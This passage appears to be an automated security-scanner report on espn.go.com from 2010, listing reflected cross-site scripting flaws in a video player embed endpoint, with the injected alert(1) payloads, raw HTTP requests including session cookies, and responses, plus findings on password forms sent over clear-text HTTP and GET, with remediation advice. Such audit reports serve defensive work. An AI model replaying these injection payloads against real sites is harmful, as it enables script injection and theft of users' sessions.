This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=f548a'%3balert(1)//361c204b438&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:19:24 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:19:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN35 Cache-Expires: Sat, 06 Nov 2010 14:27:44 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2858
The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a75'%3balert(1)//eef911a8eef was submitted in the id parameter. This input was echoed as 50a75';alert(1)//eef911a8eef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=565489750a75'%3balert(1)//eef911a8eef&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:41 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:17:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 14:26:01 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2620
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b19d"><script>alert(1)</script>5126c3ab88e was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videohub/mpf/frame/playerEmbed?id=56548979b19d"><script>alert(1)</script>5126c3ab88e&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:56 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:17:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 14:26:13 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2710
The value of the omniPageName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c58"%3balert(1)//be026dd05fd was submitted in the omniPageName parameter. This input was echoed as a6c58";alert(1)//be026dd05fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickema6c58"%3balert(1)//be026dd05fd HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:21:08 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:21:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Cache-Expires: Sat, 06 Nov 2010 14:29:28 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2910
The value of the player request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e261'%3balert(1)//073d4ffc633 was submitted in the player parameter. This input was echoed as 6e261';alert(1)//073d4ffc633 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame096e261'%3balert(1)//073d4ffc633&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:18:34 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:18:34 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 14:26:54 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3022
The value of the player request parameter is copied into a JavaScript rest-of-line comment. The payload 79c55</script><script>alert(1)</script>f04c1eba61f was submitted in the player parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame0979c55</script><script>alert(1)</script>f04c1eba61f&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:18:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:18:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 14:27:02 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3132
The value of the width request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c16e'%3balert(1)//7133253776d was submitted in the width parameter. This input was echoed as 4c16e';alert(1)//7133253776d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=4324c16e'%3balert(1)//7133253776d&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:19:56 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:19:56 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN04 Cache-Expires: Sat, 06 Nov 2010 14:28:16 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3106
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://espn.go.com/espn3/index/_/sport/basketball
The form contains the following password field:
password
Request
GET /espn3/index/_/sport/basketball HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:40:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:32:31 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Set-Cookie: SWID=0EA55118-2954-4A4C-9FA9-217C970B6D8A; path=/; expires=Sat, 13-Nov-2030 17:40:39 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:40:50 GMT Content-Length: 186323 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://espn.go.com/espn3/index/_/sport/football
The form contains the following password field:
password
Request
GET /espn3/index/_/sport/football HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:41:28 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:34:54 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Set-Cookie: SWID=0E685EB3-A53C-4C06-B9CE-883700FE2534; path=/; expires=Sat, 13-Nov-2030 17:41:28 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:43:14 GMT Content-Length: 326636 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
The page contains a form with the following action URL, which is submitted using the GET method:
http://espn.go.com/espn3/index/_/sport/basketball
The form contains the following password field:
password
Request
GET /espn3/index/_/sport/basketball HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 17:40:39 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 17:32:31 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Set-Cookie: SWID=0EA55118-2954-4A4C-9FA9-217C970B6D8A; path=/; expires=Sat, 13-Nov-2030 17:40:39 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:40:50 GMT Content-Length: 186323 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
